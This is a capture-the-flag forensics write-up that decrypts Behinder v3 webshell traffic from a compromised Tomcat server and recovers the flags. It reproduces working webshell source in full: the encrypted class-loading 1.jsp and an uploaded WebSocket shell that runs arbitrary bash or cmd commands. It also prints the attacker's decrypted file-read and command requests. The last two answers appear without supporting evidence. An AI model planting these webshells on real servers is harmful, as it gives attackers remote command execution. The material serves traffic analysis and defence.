Obtaining the key
Packet 39 of the capture uploads a zip; unpacking it yields a single file, 1.jsp:
```jsp
<%!
String xc="3c6e0b8a9c15224a";   // AES key: 16 bytes, so AES-128
String pass="ctfisfun";         // name of the request parameter that carries the payload
String md5=md5(pass+xc);        // 32 hex chars; its two halves bracket every response

// Turns the decrypted payload bytes into a class so it can be instantiated below.
class X extends ClassLoader{
    public X(ClassLoader z){super(z);}
    public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);}
}

// "AES" with no mode/padding resolves to AES/ECB/PKCS5Padding; m=true encrypts, m=false decrypts.
public byte[] x(byte[] s,boolean m){
    try{
        javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
        c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
        return c.doFinal(s);
    }catch (Exception e){return null; }
}

// Upper-case hex MD5; BigInteger.toString(16) would drop a leading zero nibble.
public static String md5(String s) {
    String ret = null;
    try {
        java.security.MessageDigest m;
        m = java.security.MessageDigest.getInstance("MD5");
        m.update(s.getBytes(), 0, s.length());
        ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {}
    return ret;
}

// Base64 through reflection so the shell runs on both java.util.Base64 and the old sun.misc classes.
public static String base64Encode(byte[] bs) throws Exception {
    Class base64;String value = null;
    try {
        base64=Class.forName("java.util.Base64");
        Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
        value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
    } catch (Exception e) {
        try {
            base64=Class.forName("sun.misc.BASE64Encoder");
            Object Encoder = base64.newInstance();
            value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
        } catch (Exception e2) {}
    }
    return value;
}

public static byte[] base64Decode(String bs) throws Exception {
    Class base64;byte[] value = null;
    try {
        base64=Class.forName("java.util.Base64");
        Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
        value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
    } catch (Exception e) {
        try {
            base64=Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
        } catch (Exception e2) {}
    }
    return value;
}
%><%
try{
    // request body: the parameter named by pass holds base64(AES(payload))
    byte[] data=base64Decode(request.getParameter(pass));
    data=x(data, false);
    if (session.getAttribute("payload")==null){
        // first request of a session: the payload is a class, cached in the session
        session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));
    }else{
        // later requests: the payload is a parameter blob handed to the cached class
        request.setAttribute("parameters",data);
        java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();
        Object f=((Class)session.getAttribute("payload")).newInstance();
        f.equals(arrOut);
        f.equals(pageContext);
        // response: md5[0:16] + base64(AES(output)) + md5[16:]
        response.getWriter().write(md5.substring(0,16));
        f.toString();
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));
        response.getWriter().write(md5.substring(16));
    }
}catch (Exception e){}
%>
```
The variable xc (the key) is used as the AES key. It is 16 bytes long, so this is AES-128.
The variable pass (the password) is the name of the request parameter that carries the payload, as shown in the request screenshot.
The MD5 operation that follows computes the MD5 of pass+xc:
MD5(3c6e0b8a9c15224a) --> 49b3c226f3e5f760fd90ec52257b31ef
Response packet:
"49b3c226f3e5f760" + base64 of the AES-128-encrypted content + "fd90ec52257b31ef"
Here is a response packet picked at random (the hex is upper-case because the shell calls toUpperCase()):
49B3C226F3E5F760LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=FD90EC52257B31EF
How to decrypt
- Request packets:
CyberChef recipe:
```
URL_Decode()
From_Base64('A-Za-z0-9+/=',true,false)
AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
Gunzip()
```
- Response packets:
First strip the leading 16 and trailing 16 characters (the two MD5 halves) by hand, then apply the CyberChef recipe:
```
From_Base64('A-Za-z0-9+/=',true,false)
AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
Gunzip()
```
Example:
Request packet 130
Response packet 136
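To make the response recipe reproducible outside CyberChef, here is an added Go decoder; it is not from the page or from the author of 1.jsp (which is the stock Behinder v3 shell). It mirrors the shell's response branch: compute md5(pass+xc), check that the frame is bracketed by its two halves, then base64-decode, AES-128-ECB-decrypt with PKCS#5 unpadding, and gunzip the middle; the request side is the same pipeline without the framing and with a URL-decode first. pass and xc are the shell's values, and the frame in main is the one quoted above.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/md5"
	"encoding/base64"
	"fmt"
	"io"
)
const shellPass, shellKey = "ctfisfun", "3c6e0b8a9c15224a" // from 1.jsp; 16-byte key => AES-128
// FrameMD5 mirrors the shell's md5(pass+xc): upper-case hex (BigInteger.toString(16) would drop a leading zero nibble).
func FrameMD5(pass, key string) string {
	return fmt.Sprintf("%X", md5.Sum([]byte(pass+key)))
}
// ecbDecrypt undoes Java's Cipher.getInstance("AES"), which means AES/ECB/PKCS5Padding.
func ecbDecrypt(key, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key or ciphertext not block aligned")
	}
	pt := make([]byte, len(ct))
	for i := 0; i < len(ct); i += aes.BlockSize {
		block.Decrypt(pt[i:], ct[i:])
	}
	if pad := int(pt[len(pt)-1]); pad >= 1 && pad <= aes.BlockSize {
		return pt[:len(pt)-pad], nil
	}
	return nil, fmt.Errorf("bad PKCS#5 padding (wrong key?)")
}
// DecodeResponse reverses the shell's response branch: md5[:16] + base64(AES-ECB(gzip(output))) + md5[16:].
func DecodeResponse(pass, key, frame string) (string, error) {
	sum := FrameMD5(pass, key)
	if len(frame) < 32 || frame[:16]+frame[len(frame)-16:] != sum {
		return "", fmt.Errorf("frame is not bracketed by md5(pass+xc)")
	}
	ct, err := base64.StdEncoding.DecodeString(frame[16 : len(frame)-16])
	if err != nil { return "", err }
	pt, err := ecbDecrypt([]byte(key), ct)
	if err != nil { return "", err }
	zr, err := gzip.NewReader(bytes.NewReader(pt)) // the payload gzips its output
	if err != nil { return "", err }
	plain, err := io.ReadAll(zr)
	return string(plain), err
}
func main() {
	// The response frame quoted on the page; hex is upper-case because of toUpperCase().
	frame := "49B3C226F3E5F760LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=FD90EC52257B31EF"
	fmt.Println(DecodeResponse(shellPass, shellKey, frame))
}
```

A frame whose prefix and suffix do not match md5(pass+xc) is rejected before any decryption, which is also the cheapest check for spotting this shell's responses in other captures.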
Decrypting every packet with the steps above gives the following (the dots in the decrypted requests are non-printable length bytes of the parameter encoding; only field names and values are shown):

- Request 120: file 1.class; decompiling it yields nothing useful
- Response 122: empty
- Request 145: methodName=readFile, fileName=/home/ctf/.bash_history
- Response 147 (contents of .bash_history):
```
ls
openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag
ls
rm flag.png
sudo ./bin/startup.sh
history -w
```
- Request 156: methodName=getFile, dirName=/home/ctf/Desktop/apache-tomcat-8.5.82/bin/
- Response 158: ok, then a listing of /home/ctf/Desktop/apache-tomcat-8.5.82/bin/ (name, type 1=file/0=directory, mtime, size, permissions):
```
tool-wrapper.sh 1 2022-08-08 14:26:07 5540 RWX
setclasspath.sh 1 2022-08-08 14:26:07 3708 RWX
digest.bat 1 2022-08-08 14:26:07 2091 RW
digest.sh 1 2022-08-08 14:26:07 1965 RWX
commons-daemon-native.tar.gz 1 2022-08-08 14:26:07 211777 RW
tomcat-juli.jar 1 2022-08-08 14:26:07 51542 RW
catalina.bat 1 2022-08-08 14:26:07 16840 RW
tomcat-native.tar.gz 1 2022-08-08 14:26:07 436593 RW
ciphers.sh 1 2022-08-08 14:26:07 1997 RWX
shutdown.bat 1 2022-08-08 14:26:07 2020 RW
version.bat 1 2022-08-08 14:26:07 2026 RW
bootstrap.jar 1 2022-08-08 14:26:07 36191 RW
daemon.sh 1 2022-08-08 14:26:07 9100 RWX
version.sh 1 2022-08-08 14:26:07 1908 RWX
startup.sh 1 2022-08-08 14:26:07 1904 RWX
startup.bat 1 2022-08-08 14:26:07 2022 RW
commons-daemon.jar 1 2022-08-08 14:26:07 25410 RW
shutdown.sh 1 2022-08-08 14:26:07 1902 RWX
ciphers.bat 1 2022-08-08 14:26:07 2123 RW
setclasspath.bat 1 2022-08-08 14:26:07 3460 RW
configtest.sh 1 2022-08-08 14:26:07 1922 RWX
tool-wrapper.bat 1 2022-08-08 14:26:07 4574 RW
catalina.sh 1 2022-08-08 14:26:07 25294 RWX
configtest.bat 1 2022-08-08 14:26:07 2040 RW
catalina-tasks.xml 1 2022-08-08 14:26:07 1664 RW
```
- Request 161: methodName=getFile, dirName=/home/ctf/Desktop/apache-tomcat-8.5.82/
- Response 163: ok, listing of /home/ctf/Desktop/apache-tomcat-8.5.82/:
```
temp 0 2022-10-04 10:31:38 4096 RWX
NOTICE 1 2022-08-08 14:26:07 1726 RW
encflag 1 2022-10-04 11:56:12 1504 RW
bin 0 2022-08-08 14:26:07 4096 RWX
webapps 0 2022-10-04 11:57:28 4096 RWX
work 0 2022-10-04 10:05:08 4096 RWX
lib 0 2022-08-08 14:26:07 4096 RWX
LICENSE 1 2022-08-08 14:26:07 57011 RW
README.md 1 2022-08-08 14:26:07 3398 RW
BUILDING.txt 1 2022-08-08 14:26:07 19992 RW
logs 0 2022-10-04 10:05:08 4096 RWX
RUNNING.txt 1 2022-08-08 14:26:07 16505 RW
RELEASE-NOTES 1 2022-08-08 14:26:07 7139 RW
CONTRIBUTING.md 1 2022-08-08 14:26:07 6210 RW
conf 0 2022-10-04 10:05:08 4096 RWX
```
- Request 166: methodName=getFile, dirName=/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/
- Response 168: ok, listing of /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/:
```
host-manager 0 2022-08-08 14:26:07 4096 RWX
1 0 2022-10-04 11:57:28 4096 RWX
docs 0 2022-08-08 14:26:07 4096 RWX
1.war 1 2022-10-04 11:57:28 1063 RW
examples 0 2022-08-08 14:26:07 4096 RWX
manager 0 2022-08-08 14:26:07 4096 RWX
ROOT 0 2022-08-08 14:26:07 4096 RWX
```
- Request 171: methodName=getFile, dirName=/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/
- Response 173: ok, listing of /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/:
```
META-INF 0 2022-10-04 11:57:28 4096 RWX
1.jsp 1 2022-10-03 11:30:15 2621 RW
```
- Request 183: methodName=uploadFile, fileName=/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/wbs.jsp, fileValue = the following JSP (a WebSocket endpoint that runs every text message it receives through cmd.exe /c or /bin/bash -c and sends the output back):
```jsp
<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>
<%!
public static class C extends Endpoint implements MessageHandler.Whole<String> {
    private Session session;
    @Override
    public void onMessage(String s) {
        try {
            Process process;
            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
            if (bool) {
                process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
            } else {
                process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
            }
            InputStream inputStream = process.getInputStream();
            StringBuilder stringBuilder = new StringBuilder();
            int i;
            while ((i = inputStream.read()) != -1) stringBuilder.append((char)i);
            inputStream.close();
            process.waitFor();
            session.getBasicRemote().sendText(stringBuilder.toString());
        } catch (Exception exception) {
            exception.printStackTrace();
        }
    }
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.session = session;
        session.addMessageHandler(this);
    }
}
%>
<%
String path = request.getParameter("path");
ServletContext servletContext = request.getSession().getServletContext();
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(C.class, path).build();
ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
try {
    if (servletContext.getAttribute(path) == null){
        container.addEndpoint(configEndpoint);
        servletContext.setAttribute(path,path);
    }
    out.println("success, connect url path: " + servletContext.getContextPath() + path);
} catch (Exception e) {
    out.println(e.toString());
}
%>
```
- Response 185: ok
- Request 188: methodName=getFile, dirName=/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/
- Response 190: ok, listing of /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/ (wbs.jsp is now present):
```
META-INF 0 2022-10-04 11:57:28 4096 RWX
1.jsp 1 2022-10-03 11:30:15 2621 RW
wbs.jsp 1 2022-10-04 11:58:52 2244 RW
```
- Request 193: methodName=execCommand; cmdLine=bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1; executableFile=bash; executableArgs=-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1; argsCount=4; arg-0=bash; arg-1=-c; arg-2=cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru; arg-3=2>&1
- Response 195 (the two echoed markers bracket the command output):
```
CYrXIi
/home/ctf/Desktop/apache-tomcat-8.5.82
rHswru
```
- Request 198: methodName=execCommand; cmdLine=bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1; executableFile=bash; executableArgs=-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1; argsCount=4; arg-0=bash; arg-1=-c; arg-2=cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls; arg-3=2>&1
- Response 200:
```
bin BUILDING.txt conf CONTRIBUTING.md encflag lib LICENSE logs NOTICE README.md RELEASE-NOTES RUNNING.txt temp webapps work
```
- Request 209: methodName=execCommand; cmdLine=bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1; executableFile=bash; executableArgs=-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1; argsCount=4; arg-0=bash; arg-1=-c; arg-2=cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64; arg-3=2>&1
- Response 212: the base64 encoding of encflag (a long base64 blob, not reproduced here)
1. What is the password of the webshell the attacker uploaded first?
The pass variable in 1.jsp is the password:
ctfisfun

2. After the first connection, what password did the attacker use to encrypt the flag image?
Response 147 (the contents of .bash_history):
```
ls
openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag
ls
rm flag.png
sudo ./bin/startup.sh
history -w
```
P@ssW0rd

3. Give the flag contained in flag.png, in the format flag{…}
encflag is the base64 string in the last response packet (212). Base64-decode it and then decrypt it with the password from the history (the aes256 in the history is aes-256-cbc, with no -pbkdf2, so decrypt with the same defaults):
```sh
base64 -d encflag.b64 > encflag   # encflag.b64: the base64 text from response 212, saved to a file
openssl enc -d -aes256 -pass pass:P@ssW0rd -in encflag -out flag.png
```
The key-derivation digest defaults to md5 before OpenSSL 1.1.0 and sha256 from 1.1.0 on; if decryption reports "bad decrypt", add -md md5 or -md sha256 to match the version that did the encryption.
flag{740afc12-43fe-11ed-b97f-00155d98d274}

4. The attacker created a new user. What is the username?
Hacker@12345

5. Give the flag printed at the end, in the format flag{…}
flag{45a61e64-434b-11ed-a260-00155d98bc46}